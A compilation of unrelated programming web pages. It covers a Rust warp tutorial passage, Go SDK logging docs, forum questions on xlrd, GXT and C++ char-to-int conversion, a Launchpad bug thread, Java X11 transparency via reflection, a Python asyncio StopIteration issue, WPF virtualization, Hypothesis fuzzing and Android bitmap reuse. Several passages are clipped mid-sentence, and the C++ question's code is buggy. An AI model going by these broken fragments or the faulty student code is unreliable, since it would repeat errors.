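The same contract is easy to see outside Rust; here is a quick Python sketch of the id-only equality and hashing described above (purely illustrative, not part of the warp project):

```python
class Simulation:
    def __init__(self, id, name=""):
        self.id = id
        self.name = name

    # Equality and hashing consider only `id`, mirroring the Rust impls above.
    # This preserves the required law: k1 == k2 implies hash(k1) == hash(k2).
    def __eq__(self, other):
        return isinstance(other, Simulation) and self.id == other.id

    def __hash__(self):
        return hash(self.id)

sims = {Simulation(1, "The Big Goodbye"), Simulation(2, "Bride Of Chaotica!")}
print(Simulation(2) in sims)  # True: a sentinel carrying only the id finds the entry
```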
One last addition I made below the Hash implementation was this:
pub fn get_simulation<'a>(sims: &'a HashSet<Simulation>, id: u64) -> Option<&'a Simulation> {
    sims.get(&Simulation {
        id,
        name: String::new(),
    })
}
Even though the only relevant field for comparisons is id, when using methods such as get() we have to pass the entire struct, so I created get_simulation() to replace it.
Ok, back to the GET method.
Getting away with it
The functions dealing with the GET method now have to deal with two additional pieces of information: the HashSet from which they will fetch the result and the parameter that might be used.
pub fn list_sims(db: models::Db) -> impl Filter<Extract = impl warp::Reply, Error = warp::Rejection> + Clone {
    let db_map = warp::any()
        .map(move || db.clone());

    let opt = warp::path::param::<u64>()
        .map(Some)
        .or_else(|_| async {
            // Ok(None)
            Ok::<(Option<u64>,), std::convert::Infallible>((None,))
        });

    warp::path!("holodeck" / ..)
        .and(opt)
        .and(warp::path::end())
        .and(db_map)
        .and_then(handlers::handle_list_sims)
}
The opt represents the optional parameter that can be sent. It takes a param and maps it into an Option (i.e., Some). If no param was provided, or_else() returns a None. The reason there's an async block there is that or_else() returns a TryFuture.
The path we are actually returning includes this opt the same way we included the db_map. The / .. at the end of path! tells the macro not to add the end(), so I could add the opt myself. That's why there's a manual end() soon after.
I didn't find this solution in the docs or in the examples. Actually, for some reason, most tutorials omit GET parameters. They either just list everything or use a query. I found one tutorial that implemented this, but they did so by creating two filters and two handlers. It didn't feel right, and I knew there should be a solution and that the problem was probably my searching skills; so I asked for help in warp's Discord channel, and the nice gentleman jxs pointed me to the solution you saw above.
The next step was to fix the handler:
pub async fn handle_list_sims(param: Option<u64>, db: models::Db) -> Result<impl warp::Reply, Infallible> {
    let mut result = db.lock().await.clone();
    if let Some(id) = param {
        result.retain(|k| k.id == id);
    }
    Ok(warp::reply::json(&result))
}
It is no longer a Matthew McConaughey handler, but it is still very simple. I am using retain instead of get_simulation() because retain leaves me with a HashSet (get would give me a models::Simulation), which is exactly what the handler must return.
$ cargo test

running 3 tests
test tests::try_create ... ok
test tests::try_create_duplicates ... ok
test tests::try_list ... ok

test result: ok. 3 passed; 0 failed; 0 ignored; 0 measured; 0 filtered out
In the next episode of Engaging Warp...
We will finish the implementation of the PUT and DELETE methods.
🖖
https://dev.to/rogertorres/rest-api-with-rust-warp-3-get-4nll
Customize logger
The logger logs information about your experiments to help you with debugging. You can customize where log information is sent and what kind of information is tracked.
The default logger in the Go SDK logs to STDOUT. If you want to disable or customize the logger, you can provide an implementation of the OptimizelyLogConsumer interface.
Custom logger implementation in the SDK
import "github.com/optimizely/go-sdk/pkg/logging"

type CustomLogger struct {
}

func (l *CustomLogger) Log(level logging.LogLevel, message string, fields map[string]interface{}) {
}

func (l *CustomLogger) SetLogLevel(level logging.LogLevel) {
}

customLogger := &CustomLogger{}
logging.SetLogger(customLogger)
Setting the log level
You can also change the default log level from INFO to any of the other log levels.
import "github.com/optimizely/go-sdk/pkg/logging"

// Set log level to Debug
logging.SetLogLevel(logging.LogLevelDebug)
Log levels
The table below lists the log levels for the Go SDK.
https://docs.developers.optimizely.com/full-stack/docs/customize-logger-go
Hi,
I am trying to read single cells in excel using python. I am not interested in reading the entire sheet at once just one cell at a time.
Basically I want to be able to read say Cell A1, store it in a variable and B1 store it in a variable.
If both cells can be read at once and stored in variables that would be better.
Here is what my code looks like:
import xlrd
wb = xlrd.open_workbook("Table.xls")
sh1 = wb.sheet_by_index(0)
print "content of", sh1.name
for rownum in range(sh1.nrows):
print sh1.row_values(rownum)
this returns the entire sheet like this:
[u'GIS_ECA_ALT_AB_BF_ACCESS_A', u'TRN_ACCESS_ALT_A']
[u'GIS_ECA_ALT_AB_BF_ACCESS_L', u'TRN_ACCESS_ALT_L']
[u'GIS_ECA_ALT_AB_BF_AIR_WEAPONS_RANGE_A', u'AIR_WEAPONS_RANGE_ALT_A']
[u'GIS_ECA_ALT_AB_BF_ATS_A', u'GRD_ATS_ALT_A']
[u'GIS_ECA_ALT_AB_BF_ATS_L', u'GRD_ATS_ALT_L']
[u'GIS_ECA_ALT_AB_BF_CITY_A', u'ADM_CITY_ALT_A']
[u'GIS_ECA_ALT_AB_BF_CONTOUR_INDEX_L', u'GNG_CONTOUR_INDEX_ALT_L']
[u'GIS_ECA_ALT_AB_BF_CONTOUR_L', u'GNG_CONTOUR_ALT_L']
[u'GIS_ECA_ALT_AB_BF_CONTOUR_T', u'GNG_CONTOUR_ALT_T']
all I want to be able to do is save the first part of line 1 into a separate variable and do the same for the second part.
The rest of the rows in the spread sheet will be read using a loop.
Please note this is just a part of an entire syntax which takes the information from here and applies in other processes.
I hope I've given enough info. Any help is appreciated.
Thanks
http://forums.devshed.com/python-programming/921755-reading-single-cells-excel-using-python-last-post.html
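For what it's worth, xlrd does expose single-cell reads directly via Sheet.cell_value(rowx, colx) (and Sheet.cell(rowx, colx).value). A minimal sketch of reading the A/B pair per row; the helper names are illustrative, not from the thread:

```python
def read_row_pair(sheet, rownum):
    # cell_value(rowx, colx) reads one cell; indices are zero-based,
    # so column A is index 0 and column B is index 1.
    return sheet.cell_value(rownum, 0), sheet.cell_value(rownum, 1)

def read_all_pairs(path):
    import xlrd  # the same third-party module the question already uses
    wb = xlrd.open_workbook(path)
    sheet = wb.sheet_by_index(0)
    return [read_row_pair(sheet, r) for r in range(sheet.nrows)]
```

Each tuple gives the two variables the poster asked for, and the loop over `range(sheet.nrows)` handles the rest of the rows.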
only commercial admins can setup branch privacy policies
Bug Description
Projects have a branch privacy policy that says whether branches are public or private by default and whether they can be public or private. (I think.) At the moment this can only be changed by losas. It would be better if there was a ui and api for allowing project owners to read this and change it. There are some business rules about who is entitled to set particular values.
This causes a lot of latency for new users and a fair amount of work for feedback@, commercial@ and losas, on which grounds Robert says this can probably be critical.
Related branches
- Curtis Hovey (community): Approve (code) on 2012-07-11; diff: 696 lines (+137/-287), 6 files modified
- Ian Booth (community): Approve on 2012-07-12; diff: 189 lines (+61/-40), 5 files modified
- j.c.sackett (community): Approve on 2012-07-12; diff: 531 lines (+185/-228), 5 files modified
- Robert Collins (community): Approve on 2012-07-16; Stuart Bishop: Pending (db), requested 2012-07-13; diff: 15 lines (+11/-0), 1 file modified (database/schema/patch-2209-26-0.sql)
- Brad Crittenden (community): Approve (code) on 2012-07-13; diff: 563 lines (+315/-6), 11 files modified
- William Grant: Approve (code) on 2012-08-22; diff: 473 lines (+27/-99), 13 files modified
I've suggested this be critical on the basis that:
- money is involved
- losas are flat out and we would like them to only be asked to do actually sensitive things.
On 5 April 2011 10:19, Robert Collins <email address hidden> wrote:
> I'm not sure that an API is helpful here, because the topic is complex
> and web pages are pretty good at explaining things.
I agree actually. We mostly need an api for making particular new or
existing branches private.
Downgrading to High as this isn't worthy of Critical escalation.
I believe disclosure will be removing branch access policies (or reframing them) and will probably fix this as a side effect.
Thank you for finding that bug, jml. This bug is about team/user branch policies. bug 290655 is about changing branch visibility. Both bugs will be fixed in a few weeks.
r15610 in stable
Fixed in stable r15613
Fixed in stable r15617
Fixed in db-stable r11767
r15629 in stable
Both BVP- and b_s_p-based sharing work fine on qastaging.
From what I have seen, using qastaging, setBranchSharin
Right, the plan is to remove the commercial-admin guards and open it up to anyone with launchpad.Edit. Probably once the code is done and we're ready to enter beta.
Fixed in stable r15846
I'm not sure that an API is helpful here, because the topic is complex and web pages are pretty good at explaining things.
https://bugs.launchpad.net/launchpad/+bug/750871
Hello,
The latest version on maven repo is 3.0.0-rc2
Could you fix please
thanks
Hermann
Type: Posts; User: hermann.rangamana
Hello,
I think the Component class would benefit from implementing the HasEnabled interface (there'd be no API change, since Component already has setEnabled(boolean)/isEnabled()). The benefit is that when i...
Hi Colin,
I'm not sure you understand my issue. Let me explain it in a simple example.
Consider that you write an application that archives stock data (last quote, and change in % compared to the...
Hi there,
I have a simple grid, with some editable columns. Autocommit is false. When i edit the column, i call a rpc which validate the data and then respond with a full object (that is,...
Thanks for your reply.
HR
Hi Colin,
Both names (repo1.maven.org and repo.maven.apache.org) direct me to 89.167.251.252.
HR
Thanks for your prompt reply!
Using the IP address, I can see the 3.0.0-rc version (@ ), so I guess it's a sync problem on some of their servers. I...
Absolutely sure.
I tried to get those files using my corporate network access or my home internet access; both fail. And when I try to list the content of the directory...
Guys,
NPE occurs in com.sencha.gxt.data.shared.Store.java, at line 126 (method isCurrentValue(M model))
public boolean isCurrentValue(M model) {
return (access.getValue(model) ==...
I encounter the same problem when building with maven using RC
From my pom.xml
<dependency>
<groupId>com.sencha.gxt</groupId>
<artifactId>gxt</artifactId>
...
Hello,
I am on GWT 3 beta 3.
I created a BorderLayoutContainer with collapsible panel on the west side. Here is the code snippet
westPanel = new ContentPanel();
centerPanel...
Thanks for your reply, steven.
Hermann
Thanks for your reply.
But what if I want my container to fill the whole browser window? I'd expect the same behavior as straight GWT panels, which automatically fill the browser window when I...
On GXT 3.0.0 beta 2, I have a simple CenterLayoutContainer with a single panel inside it (a copy-paste from the showcase, actually). But I was surprised: the content of my container is not centered,...
https://www.sencha.com/forum/search.php?s=ffb684085386d14f88446fc4e98c53a4&searchid=19067317
1. Use non-opaque Color instances. Apple even supports setting a non-opaque background Color, but you need all the components in your UI to behave, and that really makes this awkward. And slow. This may be the method of the future, but at the moment, not enough pieces are there for it to work.
2. Use undocumented/unsupported Java methods. The beauty of this is that it's easy. The trouble with this is that it's not really what you want. Start GNOME Terminal, for example, and drag the transparency slider in the preferences dialog. (You need to be running Compiz.) You'll notice that although the terminal's transparency changes, the window decorations supplied by the system and the menu bar and scroll bar supplied by the application all keep the default fully-opaque level of transparency. (More subtly than that, you'll notice that it's really just the default background that's transparent. Anything rendered on top of that is rendered normally.)
3. Native code. This is currently your only choice on MS Windows. I've never explored this because I don't care enough about transparency (or Windows) to go to the trouble.
4. Swing Hacks's embarrassing copy-the-background trick. I sometimes think that book was on a secret mission to make Java look bad. (Then again, when GNOME Terminal switched to real transparency from a similarly ugly hack, some people complained because they could no longer see XEarth through the whole window stack; they were using "transparent" terminals specifically because they wanted to see the root window. It takes all sorts.)
Here, I'm talking about method 2 for X11 (Linux and Solaris). The Mac OS equivalent is well-known, and can be found every so often on Apple's java-dev mailing list, or around the web if you search for "CWindow.setAlpha". I've yet to see the X11 equivalent, though, so that's what I'm going to show you today.
The code's really just these two lines:
long windowId = peer.getWindow();
sun.awt.X11.XAtom.get("_NET_WM_WINDOW_OPACITY").setCard32Property(windowId, value);
Things are made more complicated by the fact that Component's peer field is only accessible within its package (or via a deprecated method), and XAtom isn't necessarily available on all platforms, and will win you a warning even on Sun's Unix JDK. So it's the usual reflection dance:
import java.awt.*;
import java.lang.reflect.*;
import javax.swing.*;
import javax.swing.event.*;
public class TransparencyTest extends JFrame implements ChangeListener {
private JSlider slider;
public TransparencyTest() {
super("Transparency Test");
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
slider = new JSlider(0, 255);
slider.setValue(255);
slider.addChangeListener(this);
JPanel panel = new JPanel(new BorderLayout());
panel.add(slider, BorderLayout.CENTER);
setContentPane(panel);
setSize(new Dimension(640, 480));
setLocationRelativeTo(null);
}
public void stateChanged(ChangeEvent e) {
double value = ((double) slider.getValue())/((double) slider.getMaximum());
setWindowOpacity(this, value);
}
public void setWindowOpacity(Frame frame, double opacity) {
long value = (int) (0xff * opacity) << 24;
try {
// long windowId = peer.getWindow();
Field peerField = Component.class.getDeclaredField("peer");
peerField.setAccessible(true);
Class<?> xWindowPeerClass = Class.forName("sun.awt.X11.XWindowPeer");
Method getWindowMethod = xWindowPeerClass.getMethod("getWindow", new Class[0]);
long windowId = ((Long) getWindowMethod.invoke(peerField.get(frame), new Object[0])).longValue();
// sun.awt.X11.XAtom.get("_NET_WM_WINDOW_OPACITY").setCard32Property(windowId, value);
Class<?> xAtomClass = Class.forName("sun.awt.X11.XAtom");
Method getMethod = xAtomClass.getMethod("get", String.class);
Method setCard32PropertyMethod = xAtomClass.getMethod("setCard32Property", long.class, long.class);
setCard32PropertyMethod.invoke(getMethod.invoke(null, "_NET_WM_WINDOW_OPACITY"), windowId, value);
} catch (Exception ex) {
// Boo hoo! No transparency for you!
ex.printStackTrace();
return;
}
}
public static void main(String[] args) {
new TransparencyTest().setVisible(true);
}
}
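The value packed into _NET_WM_WINDOW_OPACITY above is just the opacity byte shifted into the top 8 bits of a 32-bit cardinal. A quick Python check of the same arithmetic (the extra mask is mine, added for safety; it is not in the Java code):

```python
def opacity_property_value(opacity):
    # Same arithmetic as the Java expression: (int) (0xff * opacity) << 24
    return (int(0xff * opacity) & 0xff) << 24

print(hex(opacity_property_value(1.0)))  # 0xff000000
print(hex(opacity_property_value(0.5)))  # 0x7f000000
print(hex(opacity_property_value(0.0)))  # 0x0
```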
I'm not sure how useful this is, but at least you can no longer complain you weren't aware you had the option.
There are cases where you might actually want this kind of transparency; the sole example amongst things I've written was an application that monitored what iTunes was playing and, whenever it changed, faded in a transparent output-only window containing huge text telling me what I was now listening to.
Such uses, though, are probably few and far between.
http://elliotth.blogspot.com/2007/08/transparent-java-windows-on-x11.html
Created on 2016-01-27 17:25 by ikelly, last changed 2016-03-02 16:04 by yselivanov. This issue is now closed.
I was playing around with this class for adapting regular iterators to async iterators using BaseEventLoop.run_in_executor:
import asyncio
class AsyncIteratorWrapper:
def __init__(self, iterable, loop=None, executor=None):
self._iterator = iter(iterable)
self._loop = loop or asyncio.get_event_loop()
self._executor = executor
async def __aiter__(self):
return self
async def __anext__(self):
try:
return await self._loop.run_in_executor(
self._executor, next, self._iterator)
except StopIteration:
raise StopAsyncIteration
Unfortunately this fails because when next raises StopIteration, run_in_executor swallows the exception and just returns None back to the coroutine, resulting in an infinite iterator of Nones.
What are you trying to do here? Can you post a simple example of an iterator that you would like to use with this? Without that it just raises my hackles -- it seems totally wrong to run an iterator in another thread. (Or is the iterator really a coroutine/future?)
The idea is that the wrapped iterator is something potentially blocking, like a database cursor that doesn't natively support asyncio. Usage would be something like this:
async def get_data():
cursor.execute('select * from stuff')
async for row in AsyncIteratorWrapper(cursor):
process(row)
Investigating this further, I think the problem is actually in await, not run_in_executor:
>>> async def test():
... fut = asyncio.Future()
... fut.set_exception(StopIteration())
... print(await fut)
...
>>> loop.run_until_complete(test())
None
Stop.
Fair enough. I think there should be some documentation though to the effect that coroutines aren't robust to passing StopIteration across coroutine boundaries. It's particularly surprising with PEP-492 coroutines, since those aren't even iterators and intuitively should ignore StopIteration like normal functions do.
As it happens, this variation (moving the try-except into the executor thread) does turn out to work but is probably best avoided for the same reason. I don't think it's obviously bad code though:
class AsyncIteratorWrapper:

    def __init__(self, iterable, loop=None, executor=None):
        self._iterator = iter(iterable)
        self._loop = loop or asyncio.get_event_loop()
        self._executor = executor

    async def __aiter__(self):
        return self

    async def __anext__(self):
        def _next(iterator):
            try:
                return next(iterator)
            except StopIteration:
                raise StopAsyncIteration
        return await self._loop.run_in_executor(
            self._executor, _next, self._iterator)
Can you suggest a sentence to insert into the docs and a place where
to insert it? (As you can imagine I'm pretty blind for such issues
myself.)
The."
Chris Angelico suggested on python-list that another possibly useful thing to do would be to add a "from __future__ import generator_stop" to asyncio/futures.py. This would at least have the effect of causing "await future" to raise a RuntimeError instead of silently returning None if a StopIteration is set on the future. Future.__iter__ is the only generator in the file, so this change shouldn't have any other effects.
Chris, can you help out here? I still don't understand the issue here. Since "from __future__ import generator_stop" only works in 3.5+ it would not work in Python 3.3/3.4 (supported by upstream asyncio with literally the same source code currently). If there's no use case for f.set_exception(StopIteration) maybe we should just complain about that?
Ultimately,"?
OK, since eventually there won't be a way to inject StopIteration into
a Future anyway (it'll always raise RuntimeError once PEP 479 is the
default behavior) we should just reject this in set_exception().
POC patch, no tests. Is TypeError right? Should it be ValueError, since the notional type is "Exception"?
I think TypeError is fine. I would make the message a bit longer to
explain carefully what's the matter.
How about "StopIteration interacts badly with generators and cannot be raised into a Future"?
S.G.T.M.
Wording changed, and a simple test added. I'm currently seeing failures in test_site, but that probably means I've messed something up on my system.
Would you mind reworking this as a PR for github.com/python/asyncio ?
That's still considered "upstream" for asyncio.
--Guido
Opened
New changeset ef5265bc07bb by Yury Selivanov in branch '3.5':
asyncio: Prevent StopIteration from being thrown into a Future
New changeset 5e2f7e51af51 by Yury Selivanov in branch 'default':
Merge 3.5 (issue #26221)
Merged.
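The merged change amounts to rejecting StopIteration eagerly when it is set on a Future. A simplified, hypothetical sketch of that guard (not the actual CPython/asyncio code; SketchFuture is an invented stand-in):

```python
# Hypothetical sketch of the guard discussed above, not the actual
# asyncio patch: a Future-like object rejects StopIteration up front,
# because a stored StopIteration would be swallowed by the
# generator-based "await" machinery and surface as a silent None.
class SketchFuture:
    def __init__(self):
        self.exception = None

    def set_exception(self, exception):
        # Reject StopIteration (and subclasses) at the point of the call.
        if isinstance(exception, StopIteration):
            raise TypeError(
                "StopIteration interacts badly with generators "
                "and cannot be raised into a Future")
        self.exception = exception
```

Any other exception type is stored as usual; only StopIteration is rejected at the point of the call, so the mistake is reported where it happens rather than much later.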
It seems like my old thread has died because the people helping me are now offline and no one else is responding, so I am just gonna start this new post.
This is an assignment I received for one of my classes:
So far this is what I have written:
At this point I am attempting to convert the characters to integers. When I cout<<Num1 [Length - 1] I get some trash number and not the actual number. Am I converting things correctly?

Code:
#include <iostream>

using namespace std;

const int Size = 20;

int main ()
{
    char FirstNumber [Size];
    char SecondNumber [Size];
    int Length;
    int Length2;
    int Num1 [Size];
    int Num2 [Size];

    cout<<"Enter the First Number : ";
    cin>>FirstNumber;
    cout<<"Enter the Second Number : ";
    cin>>SecondNumber;

    Length = strlen (FirstNumber);
    Length2 = strlen (SecondNumber);

    Num1 [Length] = FirstNumber [Size] - '0';
    Num2 [Length2] = SecondNumber [Size] - '0';

    cout<<Num1 [Length - 1];

    return 0;
}
WPF implements UI Virtualization via VirtualizingStackPanel and it works great, but the situation with Data Virtualization is a bit more complex.
After doing some experimentation I realized that VirtualizingStackPanel, when used with the WPF TreeView, does not allow the data to be virtualized because it iterates through the whole collection of data items from inside its MeasureOverride function. However, it accesses only the visible data items when used with a DataGrid or ListView, so paging or caching techniques can be used in those cases. See the following articles for more information:
- WPF: Data Virtualization – a simple example that uses a paging technique.
- UI Virtualization vs. Data Virtualization (Part 1) – an interesting sample that uses the Dispatcher for deferred loading.
If you are interested in what I tried to do with the TreeView, please read below.
I replaced VirtualizingStackPanel with Dan Crevier’s VirtualizingTilePanel by overriding TreeViewItem’s PrepareContainerForItemOverride method:
public class AsyncTreeViewItem : TreeViewItem
{
    protected override DependencyObject GetContainerForItemOverride()
    {
        return new AsyncTreeViewItem();
    }

    protected override bool IsItemItsOwnContainerOverride(object item)
    {
        return item is AsyncTreeViewItem;
    }

    protected override void PrepareContainerForItemOverride(DependencyObject element, object item)
    {
        AsyncTreeViewItem tree_view_item = element as AsyncTreeViewItem;
        if (item is Model.CategoryView)
        {
            FrameworkElementFactory factoryPanel = new FrameworkElementFactory(typeof(Controls.VirtualizingTilePanel));
            ItemsPanelTemplate template = new ItemsPanelTemplate();
            template.VisualTree = factoryPanel;
            tree_view_item.ItemsPanel = template;
        }
        base.PrepareContainerForItemOverride(element, item);
    }
}
After playing a bit with VirtualizingTilePanel’s code I made my TreeView work somehow, but it did not scroll correctly and hung sometimes. So I think that, theoretically, it is possible to use some very smart Panel instead of VirtualizingStackPanel, but in practice it is not a trivial task.
Hypothesis will speed up your testing process and improve your software quality, but when first starting out people often struggle to figure out exactly how to use it.
Until you’re used to thinking in this style of testing, it’s not always obvious what the invariants of your code actually are, and people get stuck trying to come up with interesting ones to test.
Fortunately, there’s a simple invariant which every piece of software should satisfy, and which can be remarkably powerful as a way to uncover surprisingly deep bugs in your software.
That invariant is simple: The software shouldn’t crash. Or sometimes, it should only crash in defined ways.
There is then a standard test you can write for most of your code that asserts this invariant.
It consists of two steps:
- Pick a function in your code base that you want to be better tested.
- Call it with random data.
This style of testing is usually called fuzzing.
This will possibly require you to figure out how to generate your domain objects. Hypothesis has a pretty extensive library of tools (called ‘strategies’ in Hypothesis terminology).
You’ll probably get exceptions here you don’t care about. e.g. some arguments to functions may not be valid. Set up your test to ignore those.
So at this point you’ll have something like this:
from hypothesis import given, reject
from hypothesis.strategies import integers, text

@given(integers(), text())
def test_some_stuff(x, y):
    try:
        my_function(x, y)
    except SomeExpectedException:
        reject()
In this example we generate two values - one integer, one text - and pass them to your test function. Hypothesis will repeatedly call the test function with values drawn from these strategies, trying to find one that produces an unexpected exception.
When an exception we know is possible happens (e.g. a ValueError because some argument was out of range) we call reject. This discards the example, and Hypothesis won’t count it towards the ‘budget’ of examples it is allowed to run. John Regehr has a good post on this subject if you want to know more about it.
Once you think you’ve got the hang of this, a good next step is to start looking for places with complex optimizations or Encode/Decode pairs in your code, as both are fairly easy to state properties about and rich sources of bugs.
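The Encode/Decode case deserves a concrete example: the classic round-trip property is that decoding an encoded value gives back the original. The sketch below checks that property for a toy run-length encoder using plain random data; with Hypothesis you would express the same thing with @given(text()) and let the library generate and shrink failing inputs for you (the encoder here is illustrative, not from the original article):

```python
import random

# Toy run-length encoder/decoder pair (illustrative only).
def encode(s):
    out = []
    for ch in s:
        if out and out[-1][0] == ch:
            out[-1][1] += 1          # extend the current run
        else:
            out.append([ch, 1])      # start a new run
    return out

def decode(pairs):
    return "".join(ch * n for ch, n in pairs)

# The round-trip property: decode(encode(s)) == s for arbitrary strings.
for _ in range(200):
    s = "".join(random.choice("ab") for _ in range(random.randint(0, 20)))
    assert decode(encode(s)) == s
```

The deliberately tiny "ab" alphabet makes runs (the interesting case for this encoder) likely; Hypothesis's string strategies bias generation towards such interesting shapes automatically.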
And, of course, if you’re still having trouble getting started with Hypothesis, the other easy way is to persuade your company to hire us for a training course. Drop us an email at [email protected]
BitmapFactory.Options.inBitmap causes tearing when switching ImageView bitmap often
I’ve encountered a situation where I have to display images in a slideshow that switches image very fast. The sheer number of images makes me want to store the JPEG data in memory and decode them when I want to display them. To ease on the Garbage Collector, I’m using BitmapFactory.Options.inBitmap to reuse bitmaps.
Unfortunately, this causes rather severe tearing, I’ve tried different solutions such as synchronization, semaphores, alternating between 2-3 bitmaps, however, none seem to fix the problem.
I’ve set up an example project which demonstrates this issue over at GitHub;
I’ve got a thread which decodes the bitmap, sets it on the UI thread, and sleeps for 5 ms:
Runnable runnable = new Runnable() {
    @Override
    public void run() {
        while (true) {
            BitmapFactory.Options options = new BitmapFactory.Options();
            options.inSampleSize = 1;
            if (bitmap != null) {
                options.inBitmap = bitmap;
            }
            bitmap = BitmapFactory.decodeResource(getResources(), images.get(position), options);
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    imageView.setImageBitmap(bitmap);
                }
            });
            try {
                Thread.sleep(5);
            } catch (InterruptedException e) {}
            position++;
            if (position >= images.size()) position = 0;
        }
    }
};
Thread t = new Thread(runnable);
t.start();
My idea is that ImageView.setImageBitmap(Bitmap) draws the bitmap on the next vsync, however, we’re probably already decoding the next bitmap when this happens, and as such, we’ve started modifying the bitmap pixels. Am I thinking in the right direction?
Has anyone got any tips on where to go from here?
5 solutions collected from the web for “BitmapFactory.Options.inBitmap causes tearing when switching ImageView bitmap often”
As an alternative to your current approach, you might consider keeping the JPEG data as you are doing, but also creating a separate Bitmap for each of your images, and using the inPurgeable and inInputShareable flags. These flags allocate the backing memory for your bitmaps on a separate heap that is not directly managed by the Java garbage collector, and allow Android itself to discard the bitmap data when it has no room for it and re-decode your JPEGs on demand when required. Android has all this special-purpose code to manage bitmap data, so why not use it?
You should use the onDraw() method of the ImageView since that method is called when the view needs to draw its content on screen.
I create a new class named MyImageView which extends ImageView and overrides the onDraw() method, which will trigger a callback to let the listener know that this view has finished its drawing:
public class MyImageView extends ImageView {

    private OnDrawFinishedListener mDrawFinishedListener;

    public MyImageView(Context context, AttributeSet attrs) {
        super(context, attrs);
    }

    @Override
    protected void onDraw(Canvas canvas) {
        super.onDraw(canvas);
        if (mDrawFinishedListener != null) {
            mDrawFinishedListener.onOnDrawFinish();
        }
    }

    public void setOnDrawFinishedListener(OnDrawFinishedListener listener) {
        mDrawFinishedListener = listener;
    }

    public interface OnDrawFinishedListener {
        public void onOnDrawFinish();
    }
}
In the MainActivity, define 3 bitmaps: one reference to the bitmap which is being used by the ImageView to draw, one for decoding, and one reference to the bitmap that is recycled for the next decoding. I reuse the synchronized block from vminorov’s answer, but put it in different places, with explanations in the code comments:
public class MainActivity extends Activity {

    private Bitmap mDecodingBitmap;
    private Bitmap mShowingBitmap;
    private Bitmap mRecycledBitmap;

    private final Object lock = new Object();
    private volatile boolean ready = true;

    ArrayList<Integer> images = new ArrayList<Integer>();
    int position = 0;

    // onCreate header reconstructed; it was lost in extraction
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main); // layout id assumed

        final MyImageView imageView = (MyImageView) findViewById(R.id.image);
        imageView.setOnDrawFinishedListener(new OnDrawFinishedListener() {
            @Override
            public void onOnDrawFinish() {
                /*
                 * The ImageView has finished its drawing, now we can recycle
                 * the bitmap and use the new one for the next drawing
                 */
                mRecycledBitmap = mShowingBitmap;
                mShowingBitmap = null;
                synchronized (lock) {
                    ready = true;
                    lock.notifyAll();
                }
            }
        });

        final Button goButton = (Button) findViewById(R.id.button);
        goButton.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Runnable runnable = new Runnable() {
                    @Override
                    public void run() {
                        while (true) {
                            BitmapFactory.Options options = new BitmapFactory.Options();
                            options.inSampleSize = 1;
                            if (mDecodingBitmap != null) {
                                options.inBitmap = mDecodingBitmap;
                            }
                            mDecodingBitmap = BitmapFactory.decodeResource(
                                    getResources(), images.get(position), options);

                            /*
                             * If you want the images display in order and none
                             * of them is bypassed then you should stay here and
                             * wait until the ImageView finishes displaying the
                             * last bitmap, if not, remove synchronized block.
                             *
                             * It's better if we put the lock here (after the
                             * decoding is done) so that the image is ready to
                             * pass to the ImageView when this thread resumes.
                             */
                            synchronized (lock) {
                                while (!ready) {
                                    try {
                                        lock.wait();
                                    } catch (InterruptedException e) {
                                        e.printStackTrace();
                                    }
                                }
                                ready = false;
                            }

                            if (mShowingBitmap == null) {
                                mShowingBitmap = mDecodingBitmap;
                                mDecodingBitmap = mRecycledBitmap;
                            }

                            runOnUiThread(new Runnable() {
                                @Override
                                public void run() {
                                    if (mShowingBitmap != null) {
                                        imageView.setImageBitmap(mShowingBitmap);
                                        /*
                                         * At this point, nothing has been drawn
                                         * yet, only passing the data to the
                                         * ImageView and trigger the view to
                                         * invalidate
                                         */
                                    }
                                }
                            });

                            try {
                                Thread.sleep(5);
                            } catch (InterruptedException e) {
                            }

                            position++;
                            if (position >= images.size())
                                position = 0;
                        }
                    }
                };
                Thread t = new Thread(runnable);
                t.start();
            }
        });
    }
}
You need to do the following things in order to get rid of this problem.
- Add an extra bitmap to prevent situations where the UI thread draws a bitmap while another thread is modifying it.
- Implement thread synchronization to prevent situations where the background thread tries to decode a new bitmap before the previous one has been shown by the UI thread.
I’ve modified your code a bit and now it works fine for me.
package com.example.TearingExample;

import android.app.Activity;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.ImageView;

import java.util.ArrayList;

public class MainActivity extends Activity {

    ArrayList<Integer> images = new ArrayList<Integer>();

    private Bitmap[] buffers = new Bitmap[2];
    private volatile Bitmap current;

    private final Object lock = new Object();
    private volatile boolean ready = true;

    // onCreate header reconstructed; it was lost in extraction
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main); // layout id assumed

        final ImageView imageView = (ImageView) findViewById(R.id.image);
        final Button goButton = (Button) findViewById(R.id.button);
        goButton.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Runnable runnable = new Runnable() {
                    @Override
                    public void run() {
                        int position = 0;
                        int index = 0;
                        while (true) {
                            try {
                                synchronized (lock) {
                                    while (!ready) {
                                        lock.wait();
                                    }
                                    ready = false;
                                }

                                BitmapFactory.Options options = new BitmapFactory.Options();
                                options.inSampleSize = 1;
                                options.inBitmap = buffers[index];
                                buffers[index] = BitmapFactory.decodeResource(getResources(),
                                        images.get(position), options);
                                current = buffers[index];

                                runOnUiThread(new Runnable() {
                                    @Override
                                    public void run() {
                                        imageView.setImageBitmap(current);
                                        synchronized (lock) {
                                            ready = true;
                                            lock.notifyAll();
                                        }
                                    }
                                });

                                position = (position + 1) % images.size();
                                index = (index + 1) % buffers.length;

                                Thread.sleep(5);
                            } catch (InterruptedException ignore) {
                            }
                        }
                    }
                };
                Thread t = new Thread(runnable);
                t.start();
            }
        });
    }
}
In the BM.decode(resource…) call, is the network involved?
If yes then you need to optimize the look-ahead connection and data transport across the net connection as well as your work optimizing bitmaps and memory. That can mean becoming adept at low latency or async transport using your connect protocol (http I guess). Make sure that you don't transport more data than you need. Bitmap decode can often discard 80% of the pixels in creating an optimized object to fill a local view.
If the data intended for the bitmaps is already local and there are no concerns about network latency, then just focus on reserving a collection-type data structure (listArray) to hold the fragments that the UI will swap on the page-forward, page-back events.
